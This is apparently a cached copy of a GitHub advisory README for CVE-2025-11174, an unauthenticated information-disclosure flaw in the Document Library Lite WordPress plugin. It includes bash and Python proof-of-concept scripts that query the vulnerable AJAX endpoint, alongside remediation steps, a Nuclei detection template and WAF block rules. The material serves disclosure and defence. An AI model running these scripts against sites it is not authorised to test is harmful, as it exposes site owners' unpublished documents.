Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-11174 PoC — WordPress plugin Document Library Lite 授权问题漏洞

Source
https://github.com/SnailSploit/CVE-2025-11174
Associated Vulnerability
Title:WordPress plugin Document Library Lite 授权问题漏洞 (CVE-2025-11174)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin Document Library Lite 1.1.6及之前版本存在授权问题漏洞,该漏洞源于未执行nonce或能力检查,可能导致未经验证的攻击者通过AJAX端点检索未发布的文档标题和内容。
Description
Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174
Readme
# CVE-2025-11174: Unauthenticated Information Disclosure in Document Library Lite WordPress Plugin

[![CVE](https://img.shields.io/badge/CVE-2025--11174-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11174)
[![CVSS Score](https://img.shields.io/badge/CVSS-5.3%20Medium-orange)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)
[![WordPress Plugin](https://img.shields.io/badge/WordPress-Plugin-blue)](https://wordpress.org/plugins/document-library-lite/)
[![CWE-862](https://img.shields.io/badge/CWE-862-critical)](https://cwe.mitre.org/data/definitions/862.html)
[![Wordfence](https://img.shields.io/badge/Disclosed-Wordfence-success)](https://www.wordfence.com/)

> **Keywords:** CVE-2025-11174, Document Library Lite vulnerability, information disclosure, WordPress security, unauthenticated AJAX exploit, WordPress plugin vulnerability, CWE-862, WordPress document plugin security, authorization bypass, WordPress CVE 2025

## Table of Contents

- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Technical Analysis](#technical-details)
- [Attack Vector](#attack-vector)
- [Proof of Concept](#proof-of-concept)
- [Remediation Guide](#remediation)
- [Detection](#detection)
- [CVSS Metrics](#cvss-v31-metrics)
- [References](#references)
- [Credits](#credits)
- [Security Contact](#contact)

## Overview

**Document Library Lite WordPress Plugin Information Disclosure Vulnerability (CVE-2025-11174)** - Security flaw allowing unauthenticated access to sensitive document data in WordPress document library plugin.

A critical authorization bypass vulnerability was discovered in the Document Library Lite WordPress Plugin that allows unauthenticated attackers to access sensitive document information without proper authentication.

**Discovered by:** Kai Aizen & Avraham Shemesh (SnailSploit)  
**Published:** November 1, 2025  
**CVSS Score:** 5.3 (Medium)  
**CWE:** CWE-862 - Missing Authorization  
**Plugin:** Document Library Lite  
**Vendor:** Barn2 Plugins  
**Attack Type:** Unauthenticated Information Disclosure  
**Required Privileges:** None (Unauthenticated Attack)

## Vulnerability Details

### Description

The Document Library Lite plugin for WordPress contains an improper authorization vulnerability in all versions up to and including 1.1.6. The plugin exposes an unauthenticated AJAX action `dll_load_posts` which returns a JSON table of document data without performing nonce or capability checks.

### Impact

This vulnerability allows unauthenticated attackers to:
- Access document metadata without authorization
- Retrieve document listings that should be restricted
- View document information intended for authenticated users only
- Enumerate documents stored in the Document Library

**Note:** The CVSS score of 5.3 (Medium severity) reflects limited information disclosure. While the vulnerability allows unauthenticated access to document data, the impact is rated as Low for confidentiality with no integrity or availability impact.

### Affected Versions

- **Vulnerable:** All versions ≤ 1.1.6
- **Patched:** Version 1.1.7 and above

### CVSS v3.1 Metrics

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
```

| Metric | Value |
|--------|-------|
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | None (PR:N) |
| User Interaction | None (UI:N) |
| Scope | Unchanged (S:U) |
| Confidentiality | Low (C:L) |
| Integrity | None (I:N) |
| Availability | None (A:N) |

**CVSS v3.1 Breakdown:**
- **Attack Vector (AV):** Network - The vulnerability can be exploited remotely over a network
- **Attack Complexity (AC):** Low - No special conditions are required for exploitation
- **Privileges Required (PR):** None - No authentication or privileges are required
- **User Interaction (UI):** None - The exploit works without any user interaction
- **Scope (S):** Unchanged - The vulnerability only affects the vulnerable component
- **Confidentiality Impact (C):** Low - Limited information disclosure
- **Integrity Impact (I):** None - No integrity impact
- **Availability Impact (A):** None - No availability impact

## Technical Details

### Vulnerability Root Cause

The AJAX action `dll_load_posts` is registered without proper authentication or authorization checks:

```php
// Vulnerable code pattern (simplified)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
```

The `wp_ajax_nopriv_` prefix indicates this action is accessible to non-authenticated users, and the callback function does not implement:
- Nonce verification
- Capability checks
- User authentication validation

### Attack Vector

```
POST /wp-admin/admin-ajax.php
action=dll_load_posts
```

The vulnerability can be exploited through the WordPress admin-ajax.php endpoint without authentication.

## Proof of Concept

⚠️ **For Educational and Authorized Testing Purposes Only**

### Bash PoC

```bash
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"
```

### Python PoC

```python
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)
```

## Remediation

### For Site Administrators

**Immediate Action Required:**

1. Update to Document Library Lite version **1.1.7** or later immediately
2. Review your site's access logs for suspicious POST requests to `admin-ajax.php` with `action=dll_load_posts`
3. If you cannot update immediately, consider temporarily disabling the plugin

### Update Instructions

**Via WordPress Admin:**
1. Navigate to **Plugins > Installed Plugins** in WordPress admin
2. Locate "Document Library Lite"
3. Click **Update Now** to upgrade to version 1.1.7 or later
4. Verify the update was successful

**Using WP-CLI:**
```bash
wp plugin update document-library-lite
```

### For Plugin Developers

Ensure all AJAX handlers implement proper security controls:

```php
// Example of proper AJAX security
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Verify nonce
    if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('Invalid nonce');
    }
    
    // Check capabilities
    if (!current_user_can('read')) {
        wp_send_json_error('Insufficient permissions');
        wp_die();
    }
    
    // Your secure code here
}
```

## Detection

### WordPress Plugin Check

```bash
# Check if vulnerable version is installed
wp plugin list | grep -i "document-library-lite"
```

### Security Scanner Rules

**Nuclei Template:**
```yaml
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-research
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200
```

### Web Application Firewall Rules

**ModSecurity Rule:**
```apache
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"
```

**Nginx/OpenResty Rule:**
```nginx
if ($request_uri ~* "admin-ajax\.php") {
    if ($args ~* "action=dll_load_posts") {
        return 403;
    }
}
```

## Timeline

- **November 1, 2025** - Vulnerability publicly disclosed
- **November 1, 2025** - CVE record published
- **November 2025** - Patch released (version 1.1.7)

## References

- [CVE-2025-11174 - CVE.org](https://www.cve.org/CVERecord?id=CVE-2025-11174)
- [GitHub Advisory Database](https://github.com/advisories/GHSA-cq4p-v24g-p55q)
- [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/id/2b73d48a-1f10-4e47-a18f-82a3103b72bd?source=cve)
- [WordPress Plugin Directory](https://wordpress.org/plugins/document-library-lite/)

## Credits

**Researchers:**  
- [**Avraham Shemesh**](https://www.linkedin.com/in/abeshemesh/)  
- [**Kai Aizen**](https://linkedin.com/in/kaiaizen) - [SnailSploit](https://snailsploit.com)

**Disclosure Process:** Coordinated disclosure

## Disclaimer

This information is provided for security research and defensive purposes only. Any exploitation of this vulnerability for malicious purposes is illegal and unethical. Always obtain proper authorization before testing systems you do not own.

## Contact

For questions or additional information about this vulnerability:
- **Email:** kai@owasp.com
- **Website:** [snailsploit.com](https://snailsploit.com)
- **Organization:** SnailSploit Security Research

---

*Last updated: November 2, 2025*
File Snapshot

 [4.0K]  /data/pocs/8bf173ba4c957e7db95cf42a1e66b038aaef6bd6
├── [2.2K]  CHANGELOG.md
├── [7.7K]  CONTRIBUTING.md
├── [8.4K]  exploit.py
├── [3.8K]  exploit.sh
├── [1.4K]  LICENSE
├── [ 11K]  README.md
├── [  32]  requirements.txt
├── [2.8K]  SECURITY.md
├── [ 402]  targets.txt.example
└── [8.2K]  USAGE.md

1 directory, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.